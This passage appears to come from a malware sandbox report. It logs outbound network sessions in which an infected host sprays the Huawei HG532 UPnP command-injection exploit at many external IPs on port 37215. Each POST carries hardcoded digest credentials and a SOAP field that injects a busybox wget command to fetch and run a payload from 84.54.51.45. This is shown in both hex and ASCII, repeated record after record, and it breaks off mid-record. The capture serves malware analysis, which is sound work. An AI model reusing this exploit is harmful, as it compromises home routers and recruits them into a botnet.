2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1906192.168.2.154183041.27.232.2837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599925995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1907192.168.2.154477041.28.187.2037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599968910 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1908192.168.2.153796441.250.30.3037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599971056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1909192.168.2.154809041.113.177.16137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599971056 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1910192.168.2.154248041.60.58.19337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.599992990 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1911192.168.2.153488641.211.254.5537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600013971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1912192.168.2.154855641.67.242.6137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600030899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1913192.168.2.155479841.209.71.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600056887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1914192.168.2.153901641.17.171.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600075960 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1915192.168.2.155304041.48.118.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600117922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1916192.168.2.153794041.110.77.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.600120068 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
